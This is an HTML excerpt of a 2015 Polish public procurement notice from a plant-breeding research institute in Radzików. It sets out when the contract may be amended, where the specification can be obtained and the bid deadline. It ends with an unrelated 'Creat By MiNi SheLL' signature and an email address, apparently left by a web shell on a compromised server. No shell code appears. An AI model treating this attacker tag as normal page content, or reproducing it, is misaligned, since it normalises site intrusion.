<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Istotne postanowienia dla stron zawiera wzór umowy (załącznik nr 8 do SIWZ).
2.	Zgodnie z art. 144 ust. 1 ustawy Prawo zamówień publicznych Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru wykonawcy, w przypadku wystąpienia, co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia:
	
a.	zmiany przepisów powodujących konieczność zastosowania innych rozwiązań niż zakładano w opisie przedmiotu zamówienia;
b.	braku lub wady dokumentacji projektowej lub kosztorysowej;
c.	zmian w dokumentacji projektowej lub kosztorysowej;
d.	zmian w harmonogramie prac;
e.	rezygnacji z wykonania części prac;
f.	zmiany personelu kierowniczego wykonawcy;
g.	waloryzacji wynagrodzenia;
h.	wystąpienia siły wyższej.

3. Nie stanowi zmiany w rozumieniu art. 144 ustawy Prawo Zamówień Publicznych:

1)	zmiana danych związanych z obsługą administracyjno-organizacyjną umowy np. zmiana rachunku bankowego,
2)	zmiana danych teleadresowych, zmiany osób wykazanych do kontaktów między stronami.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.ihar.edu.pl/roboty_budowlane.php?news_id=82&news_page=1<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Instytut Hodowli i Aklimatyzacji Roślin
 - Państwowy Instytut Badawczy
Radzików, 05-870 Błonie
Budynek laboratorium II, p. 36.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.09.2015 godzina 14:00, miejsce: Miejscem składania ofert jest: IHAR-PIB  Radzików, Kancelaria Ogólna, pokój nr 39.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 60 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com